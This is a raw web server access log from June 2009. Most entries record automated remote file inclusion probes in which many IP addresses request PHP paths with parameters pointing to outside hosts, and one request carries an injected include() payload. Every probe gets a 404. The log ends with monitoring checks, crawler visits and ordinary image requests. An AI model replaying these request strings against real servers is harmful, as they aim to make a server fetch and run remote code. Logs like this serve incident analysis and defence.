198.31.50.73 - - [22/Jun/2009:05:06:02 -0400] "GET /logs/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:05 -0400] "GET /include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:05 -0400] "GET /logs/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:05 -0400] "GET /logs/access_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:08 -0400] "GET /include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:08 -0400] "GET /logs/access_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:08 -0400] "GET /logs/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:09 -0400] "GET /logs/error_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:11 -0400] "GET /logs/error_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:15 -0400] "GET /logs/error_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:05:07:13 -0400] "GET /logs/access_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:05:07:21 -0400] "GET /logs/error_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:05:07:28 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
198.31.50.73 - - [22/Jun/2009:05:08:46 -0400] "GET /logs/access_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:08:56 -0400] "GET /logs/error_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:17 -0400] "GET /logs/access_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:09:21 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:09:21 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:09:21 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:30 -0400] "GET /logs/access_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:34 -0400] "GET /logs/error_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:09:39 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:41 -0400] "GET /logs/error_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:44 -0400] "GET /logs/access_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:09:46 -0400] "GET /logs/error_log.Q109050700%20%20/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:05:10:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [22/Jun/2009:05:10:47 -0400] "GET /logs/access_log.Q109052900%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:10:50 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:10:50 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:10:50 -0400] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:11:49 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:11:57 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:05:12:29 -0400] "GET /images/over-index3_kirschner.jpg HTTP/1.1" 200 1577 "-" "Googlebot-Image/1.0"
84.201.208.50 - - [22/Jun/2009:05:13:53 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:14:33 -0400] "GET /logs/access_log.Q109060300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:05:15:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.30.100.97 - - [22/Jun/2009:05:16:22 -0400] "GET /logs/error_log.Q109060500//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:16:58 -0400] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:17:01 -0400] "GET /logs/access_log.Q109052800%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:17:01 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:17:01 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:15 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:15 -0400] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:15 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:22 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
60.251.217.4 - - [22/Jun/2009:05:18:23 -0400] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:24 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
60.251.217.4 - - [22/Jun/2009:05:18:27 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
60.251.217.4 - - [22/Jun/2009:05:18:27 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:18:31 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
60.251.217.4 - - [22/Jun/2009:05:18:46 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:25 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:27 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:27 -0400] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:05:19:36 -0400] "GET /logs/access_log.Q109052000%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:37 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:37 -0400] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:19:37 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:19:58 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:20:00 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:20:06 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.117.172.131 - - [22/Jun/2009:05:20:06 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:05:20:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
163.26.29.2 - - [22/Jun/2009:05:20:54 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:20:54 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:20:54 -0400] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:21:26 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:21:54 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:21:54 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:21:54 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:21:58 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:21:58 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:21:58 -0400] "GET //include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
163.26.29.2 - - [22/Jun/2009:05:22:09 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.80.195.41 - - [22/Jun/2009:05:22:50 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; YComp 5.0.0.0; SV1; .NET CLR 1.1.4322; InfoPath.1)"
60.251.217.4 - - [22/Jun/2009:05:23:53 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:23:55 -0400] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:02 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:02 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:02 -0400] "GET //index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:05:24:15 -0400] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:16 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:16 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:05:24:17 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:05:24:39 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.251.217.4 - - [22/Jun/2009:05:25:07 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:05:25:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [22/Jun/2009:05:25:56 -0400] "GET /logs/error_log.Q108082000 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.155.69.58 - - [22/Jun/2009:05:28:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:48 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:28:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:16 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:29:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
